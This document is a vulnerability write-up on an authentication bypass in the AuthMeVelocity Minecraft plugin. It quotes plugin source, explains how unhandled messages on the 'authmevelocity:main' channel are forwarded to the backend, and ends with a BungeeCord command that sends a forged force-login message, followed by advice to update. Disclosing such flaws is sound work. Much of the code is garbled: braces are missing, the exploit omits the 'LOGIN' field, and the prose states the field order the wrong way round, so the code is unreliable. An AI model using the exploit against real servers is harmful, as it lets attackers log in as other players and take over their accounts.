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AuthMe Bypass




AuthMeVelocity is a plugin developed by 4drian3d to auto login players across servers in a velocity network. They used channels.


In the source code of the velocity side, you can see the following code

public EventTask executeAsync(final PluginMessageEvent event) {
    return EventTask.async(() -> {
        plugin.logDebug(() -> "PluginMessageEvent | Start");
        if (notAllowedEvent(event)) {
            plugin.logDebug(() -> "PluginMessageEvent | Not allowed");

        final ServerConnection connection = (ServerConnection) event.getSource();


        final ByteArrayDataInput input = event.dataAsDataStream();
        final String message = input.readUTF();
        final MessageType type = TYPES.valueOrThrow(message.toUpperCase(Locale.ROOT));
        final String name = input.readUTF();
        final Player player = proxy.getPlayer(name).orElse(null);

        switch (type) {
            case LOGIN -> {
                plugin.logDebug("PluginMessageEvent | Login type");
                if (player != null && plugin.addPlayer(player)) {
                    eventManager.fireAndForget(new ProxyLoginEvent(player));
                    if (plugin.config().get().sendOnLogin().sendToServerOnLogin()) {
                        this.createServerConnectionRequest(player, connection);
                    plugin.logDebug("PluginMessageEvent | Player not null");
            case LOGOUT -> {
                plugin.logDebug("PluginMessageEvent | Logout type");
                if (player != null && plugin.removePlayer(player)){
                    eventManager.fireAndForget(new ProxyLogoutEvent(player));
                    plugin.logDebug(() -> "PluginMessageEvent | Player " + name + " not null");
            case REGISTER -> {
                plugin.logDebug("PluginMessageEvent | Register");
                if (player != null) {
                    eventManager.fireAndForget(new ProxyRegisterEvent(player));
                    plugin.logDebug(() -> "PluginMessageEvent | Player " + name + " not null");
            case UNREGISTER -> {
                plugin.logDebug("PluginMessageEvent | Unregister type");
                if (player != null) {
                    plugin.logDebug(() -> "PluginMessageEvent | Player " + name + " not null");
                    eventManager.fireAndForget(new ProxyUnregisterEvent(player));
            case FORCE_UNREGISTER -> {
                eventManager.fireAndForget(new ProxyForcedUnregisterEvent(player));
                plugin.logDebug(() -> "PluginMessageEvent | Forced Unregister type, player " + name);


private boolean notAllowedEvent(PluginMessageEvent event) {
    if (!event.getResult().isAllowed()) {
        plugin.logDebug("PluginMessageEvent | Result not allowed");
        return true;
    if (!(event.getSource() instanceof ServerConnection)) {
        plugin.logDebug("PluginMessageEvent | Not ServerConnection");
        return true;
    final var identifier = event.getIdentifier();
    if (!(identifier.equals(AuthMeVelocityPlugin.MODERN_CHANNEL)
            || identifier.equals(AuthMeVelocityPlugin.LEGACY_CHANNEL))) {
        plugin.logDebug(() -> "PluginMessageEvent | Not AuthMeVelocity Identifier: " + identifier.getId());
        return true;
    return false;

Method notAllowedEvent returns false if the connection is not a player connection. But in executeAsync method, event is never getting set to handled and hence getting forwarded to the backend server having the AuthMeVelocity-Paper plugin to force login the player when the message is received as coded in the following code.

public void onPluginMessageReceived(
        final @NotNull String identifier,
        final @NotNull Player $,
        final byte @NotNull [] bytes
) {
    if (identifier.equals("authmevelocity:main")) {
        final ByteArrayDataInput input = ByteStreams.newDataInput(bytes);

        final String data = input.readUTF();
        final String username = input.readUTF();
        processData(username, data);
        plugin.logDebug("PluginMessage | AuthMeVelocity identifier processed");

private void processData(String name, String data) {
    if (MessageType.LOGIN.toString().equals(data)) {
        final Player player = this.plugin.getServer().getPlayer(name);
        if (player == null) {
        plugin.logDebug("PluginMessage | Login Message");
        Bukkit.getPluginManager().callEvent(new LoginByProxyEvent(player));


By sending a plugin message on channel authmevelocity:main and writing the first UTF to your username and the second UTF to "LOGIN". Here is an implementation of this exploit in BungeeCord bridge method

public void execute(CommandSender sender, String[] args) {
    ByteArrayOutputStream b = new ByteArrayOutputStream();
    DataOutputStream out = new DataOutputStream(b);

    try {
        out .writeUTF(sender.getName());
        StringBuilder stringBuilder = new StringBuilder();
    } catch (IOException var10) {

    ((ProxiedPlayer)sender).getServer().sendData("authmevelocity:main", b.toByteArray());
    sender.sendMessage("Force login payload sent");


Just update your proxy plugin to the latest version.